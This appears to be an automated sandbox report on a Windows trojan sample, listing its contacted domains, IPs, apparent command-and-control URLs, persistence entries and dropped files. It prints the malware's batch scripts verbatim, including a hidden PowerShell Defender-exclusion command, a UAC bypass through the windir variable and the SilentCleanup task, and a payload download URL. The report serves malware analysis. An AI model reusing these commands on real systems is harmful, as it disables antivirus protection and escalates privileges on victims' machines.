          http://www.delhibudokankarate.com/6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.beastninjas.com/6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.mypursuitpodcast.com/6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.dragonshipping.com/6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.vavasoo.com/6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8100%Avira URL Cloudmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://www.cdnbest.com/?code=4040%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8100%Avira URL Cloudmalware
          http://www.kilbyrnefarm.com/6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe
          http://www.schoolfrontoffice.com/6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          besport24.com
          		51.83.52.226
          		truefalse
            		high
            beastninjas.com
            		34.102.136.180
            		truefalse
              		high
              www.delhibudokankarate.com
              		154.215.87.120
              		truefalse
                		high
                mypursuitpodcast.com
                		34.102.136.180
                		truefalse
                  		high
                  www.vavasoo.com
                  		64.190.62.111
                  		truefalse
                    		high
                    schoolfrontoffice.com
                    		34.102.136.180
                    		truefalse
                      		high
                      www.mobiessence.com
                      		52.58.78.16
                      		truefalse
                        		high
                        www.dragonshipping.com
                        		86.105.245.69
                        		truefalse
                          		high
                          shops.myshopify.com
                          		23.227.38.74
                          		truefalse
                            		high
                            kilbyrnefarm.com
                            		34.98.99.30
                            		truefalse
                              		high
                              www.mylifeinpark.com
                              		35.186.238.101
                              		truefalse
                                		high
                                www.importexportasia.com
                                		23.27.129.115
                                		truefalse
                                  		high
                                  www.kilbyrnefarm.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.f9fui8.xyz
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.trendyheld.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.schoolfrontoffice.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.besport24.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.beastninjas.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              onedrive.live.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                pxqklq.sn.files.1drv.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.opticatervisof.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    www.mypursuitpodcast.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      www.titanusedcarsworth.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8false
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.delhibudokankarate.com/6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.beastninjas.com/6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mypursuitpodcast.com/6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.dragonshipping.com/6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.vavasoo.com/6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.kilbyrnefarm.com/6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.schoolfrontoffice.com/6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8false
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.com/designersGexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                https://pxqklq.sn.files.1drv.com/y4mAqf93vESEsLAwmv3Js3T3TVTVs9n9BMjWgdbjboex1CPBHIn5H8wAnTdclH8voCtFdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers?explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.tiro.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designersexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.goodfont.co.krexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.carterandcone.comlexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.sajatypeworks.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.typography.netDexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://fontfabrik.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.founder.com.cn/cnexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers8explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.fonts.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.sandoll.co.krexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://www.cdnbest.com/?code=404rundll32.exe, 0000001C.00000002.865949851.0000000005342000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.sakkal.comexplorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                52.58.78.16
                                                                                		www.mobiessence.comUnited States
                                                                                		16509AMAZON-02USfalse
                                                                                86.105.245.69
                                                                                		www.dragonshipping.comNetherlands
                                                                                		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                                                23.227.38.74
                                                                                		shops.myshopify.comCanada
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                34.98.99.30
                                                                                		kilbyrnefarm.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                154.215.87.120
                                                                                		www.delhibudokankarate.comSeychelles
                                                                                		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                35.186.238.101
                                                                                		www.mylifeinpark.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                23.27.129.115
                                                                                		www.importexportasia.comUnited States
                                                                                		18779EGIHOSTINGUSfalse
                                                                                34.102.136.180
                                                                                		beastninjas.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                64.190.62.111
                                                                                		www.vavasoo.comUnited States
                                                                                		11696NBS11696USfalse
                                                                                51.83.52.226
                                                                                		besport24.comFrance
                                                                                		16276OVHFRfalse

                                                                                General Information

                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                Analysis ID:458655
                                                                                Start date:03.08.2021
                                                                                Start time:16:14:23
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 15m 52s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:Form_TT_EUR57,890.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:40
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@32/10@29/10
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 33.3% (good quality ratio 29.9%)
                                                                                • Quality average: 73.9%
                                                                                • Quality standard deviation: 31.2%
                                                                                HCA Information:
                                                                                • Successful, ratio: 96%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                • TCP Packets have been reduced to 100
                                                                                • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 104.43.193.48, 13.107.43.13, 13.107.42.12, 13.88.21.125, 20.82.210.154, 51.103.5.186, 80.67.82.235, 80.67.82.211, 20.54.110.249, 40.112.88.60, 23.211.4.86
                                                                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, l-0004.dc-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, wns.notify.trafficmanager.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458655/sample/Form_TT_EUR57,890.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                16:15:18API Interceptor2x Sleep call for process: Form_TT_EUR57,890.exe modified
                                                                                16:15:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk C:\Users\Public\Libraries\kjalhdF.url
                                                                                16:15:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk C:\Users\Public\Libraries\kjalhdF.url
                                                                                16:15:46API Interceptor2x Sleep call for process: Fdhlajk.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                No context

                                                                                Domains

                                                                                No context

                                                                                ASN

                                                                                No context

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\Public\KDECO.bat
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):155
                                                                                Entropy (8bit):4.687076340713226
                                                                                Encrypted:false
                                                                                SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                                                                MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                                                                SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                                                                SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                                                                SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                                                                C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):702464
                                                                                Entropy (8bit):7.145527542958135
                                                                                Encrypted:false
                                                                                SSDEEP:12288:CHuv6TaXda6yswPypNz+w5cUsCPFExCUaMliTE5pPYrfFyA:466ga6ys0Kz+wHpzUEoRYrt
                                                                                MD5:811EA41E60760A97B5F28973618728FE
                                                                                SHA1:EC072CB8CB67785CA7FBA45D36C6264B7EED65CD
                                                                                SHA-256:E6BD5F8475731BCCA5F6B74327A68EE4B7FA5B0662521FEFF1D92424DA149151
                                                                                SHA-512:150A47AFF7F971B4361B59C377358E0B3F29E713F89C8789BEA38D8BF916D71D5CCAF8165756422999213F54DF69F1E0D1E89D120351B162FE03256660AC681F
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 20%
                                                                                Reputation:unknown
                                                                                Preview: MZ......................@...............................................!..L.!...... ....... .... .. ... ..... .................................................................................................................................................PE..L....^B*............................D.............@..........................@...................@...........................p..\(...0...........................k..................................................pw..D............................text............................... ..`.itext.............................. ..`.data...............................@....bss....t7...0...........................idata..\(...p...*..................@....tls....4............<...................rdata...............<..............@..@.reloc...k.......l...>..............@..B.rsrc........0......................@..@.............p......................@..@................................................................................................
                                                                                C:\Users\Public\Libraries\kjalhdF.url
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe">), ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):96
                                                                                Entropy (8bit):4.888420610714718
                                                                                Encrypted:false
                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMZVJV4ASsGKd7ovn:HRYFVmTWDyz+VUASsb7yn
                                                                                MD5:66065C0B71DEE544AB32771C8D17D790
                                                                                SHA1:2CD3B71D32CC304ADDECDB89ACE0134364A3DCD0
                                                                                SHA-256:A5F477EEC9B9631F0222BF481117E47093ABAA06C1178B941825BF4D2EE3100F
                                                                                SHA-512:CA639F6551339CAB9DF8260BEB3C0D0A3F40DC6B0901FB5ABE2F10CC2D076674355CC3462AD90DE7D179B2F5ECB5166A5457B5F97D935180DE078A0E0FDCBFB1
                                                                                Malicious:false
                                                                                Yara Hits:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\kjalhdF.url, Author: @itsreallynick (Nick Carr)
                                                                                Reputation:unknown
                                                                                Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe"..IconIndex=3..
                                                                                C:\Users\Public\Trast.bat
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):34
                                                                                Entropy (8bit):4.314972767530033
                                                                                Encrypted:false
                                                                                SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                                                                MD5:4068C9F69FCD8A171C67F81D4A952A54
                                                                                SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                                                                SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                                                                SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                Preview: start /min C:\Users\Public\UKO.bat
                                                                                C:\Users\Public\UKO.bat
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):250
                                                                                Entropy (8bit):4.865356627324657
                                                                                Encrypted:false
                                                                                SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                                                                MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                                                                SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                                                                SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                                                                SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                                                                C:\Users\Public\nest
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):9
                                                                                Entropy (8bit):3.169925001442312
                                                                                Encrypted:false
                                                                                SSDEEP:3:an:an
                                                                                MD5:4ED4AE38C3E03B184BC7334DC4856335
                                                                                SHA1:8BD720F1E99495D1865663737482D2A024FF03A9
                                                                                SHA-256:CAD47A79A1BB52E766B915D2C6E10AAF4DD26FCD622278635043FC33FD5FAF26
                                                                                SHA-512:D250939C49EC79201CBF6140B73771C59912B5F85DAD70D1915636938A0B445562D346D87301CBCA4D36C6D782F5E571A9A0BC763E658C2C820A14609FBEF94C
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                Preview: Fdhlajk..
                                                                                C:\Users\Public\nest.bat
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):53
                                                                                Entropy (8bit):4.263285494083192
                                                                                Encrypted:false
                                                                                SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                                                                                MD5:8ADA51400B7915DE2124BAAF75E3414C
                                                                                SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                                                                                SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                                                                                SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                Preview: start /min reg delete hkcu\Environment /v windir /f..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Fdhlajkqzshwymncekoaweuudqrkiey[1]
                                                                                Process:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                File Type:data
                                                                                Category:downloaded
                                                                                Size (bytes):274944
                                                                                Entropy (8bit):7.99609137175565
                                                                                Encrypted:true
                                                                                SSDEEP:6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
                                                                                MD5:B9CB610A00F7B9437BC7A3B900127957
                                                                                SHA1:BBAF86A0E368B1A40A76EF96091BA13A1C17412A
                                                                                SHA-256:C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
                                                                                SHA-512:5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                IE Cache URL:https://pxqklq.sn.files.1drv.com/y4m641rkE9auVPSdhWwPjdTtM26bhtzrxqu3Ws5cLechOaa-Ew2GgA9YjCez1BWH7nhy3rCE39ylgB73ZmApCXYC-jTr-71SUscX_W7iORBv3c-lL9IVSMDQB0gMuugpPCm_DT5OW1IimWPVN-MULBX1uHxg7JH0WYvj5QnBEub1eNlUT9l2BSoTJ2hVY85iENH4xTePyDuwcfsutsiGPcpFw/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
